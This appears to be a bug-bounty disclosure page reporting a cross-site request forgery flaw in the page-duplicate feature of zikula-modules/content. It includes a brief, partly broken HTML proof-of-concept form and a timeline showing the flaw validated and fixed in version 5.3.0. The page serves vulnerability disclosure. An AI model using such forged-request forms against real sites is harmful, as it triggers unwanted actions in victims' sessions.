Cross-Site Request Forgery (CSRF) in zikula-modules/content


Reported on

Dec 27th 2021


There is no csrf protection for content page duplicate functionality.

Proof of Concept

<!DOCTYPE html>



<form method="GET" action="">

<input type="text" name="_zsid" value="aus942jl2kph2f9mrlc0520pmm">

<input type="submit" value="Send">



</script> </form> </body>



This vulnerability is capable of creating more number of duplicates by clicking malicious links

We are processing your report and will contact the zikula-modules/content team within 24 hours. a year ago
We have contacted a member of the zikula-modules/content team and are waiting to hear back a year ago
Axel Guckelsberger validated this vulnerability a year ago
Asura-N has been awarded the disclosure bounty
The fix bounty is now up for grabs
Axel Guckelsberger marked this as fixed in 5.3.0 with commit 5e9bb4 a year ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
to join this conversation